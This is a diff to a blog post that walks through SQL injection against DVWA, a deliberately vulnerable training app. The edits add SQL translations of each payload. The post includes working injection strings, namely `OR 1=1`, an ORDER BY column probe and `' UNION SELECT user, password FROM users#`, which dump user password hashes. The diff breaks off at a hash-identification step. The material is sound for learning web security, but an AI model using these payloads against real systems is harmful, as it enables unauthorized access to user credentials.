CSpanias/cspanias.github.io/_posts/2023-12-12-DVWA - SQL Injection.md

     ```sql
     SELECT first_name, last_name
     FROM users
-    WHERE user_id = '6'
+    WHERE user_id = '1'
-    OR '1'='1'
+    OR 1=1
     ```

 3. So we have the `First name` and `Surname` fields of all 5 users.
 We need to first find out if more fields are available in the database.
-According to [PortSwigger](https://portswigger.net/web-security/sql-injection/union-attacks) one way of doing that is by performing a **UNION attack** and the use of `ORDER BY` clause:
+According to [PortSwigger](https://portswigger.net/web-security/sql-injection/union-attacks) one way of doing that is by performing a **UNION attack** combined with `ORDER BY` clause.
+This works because the value after the `ORDER BY` clause incidates the column index, thus, if we try to order our table with the value of, for instance, `5`, while the table has only `4` columns, we will get back an "*unknown column*" error:

-    > Notice that we are using [MariaDB](https://mariadb.com/kb/en/comment-syntax/), so we need to end our payload either with `#` or `-- `.
+    > Notice that we are using [MariaDB](https://mariadb.com/kb/en/comment-syntax/), so we need to end our payload either with `#` or `-- ` (notice the **space** after the double dash).

     If we inject `' ORDER BY 1-- ` we get nothing back, so we increment the number until we get an error:

     ![](order_by_3.png)

+    This translates to:
+    ```sql
+    SELECT first_name, last_name
+    FROM users
+    WHERE user_id = ''
+    ORDER BY 1
+    ```

-4. We got the error on `3`, so this confirms that there are only 2 fields in that table.
+4. We got the error on `3`, so this confirms that there are only 2 columns in that table.
 We can try guessing those fields, for instance, inputting `' UNION SELECT username, password FROM users#`:

     ![](username_error.png)

+    This translates to:
+    ```sql
+    SELECT first_name, last_name
+    FROM users
+    WHERE user_id = ''
+    UNION
+    SELECT username, password
+    FROM users
+    ```

 5. The field `username` does not exist, so we could try changing that to something similar, such as `' UNION SELECT user, password FROM users#`:

     ![](user_success.png)

-6. The database gaves the passwords in hash format instead of plaintext.
+    This translates to:
+    ```sql
+    SELECT first_name, last_name
+    FROM users
+    WHERE user_id = ''
+    UNION
+    SELECT user, password
+    FROM users
+    ```

+6. We managed to get the hashed passwords.
 We can find the hash type as follows:

     ```shell
     # check the hash type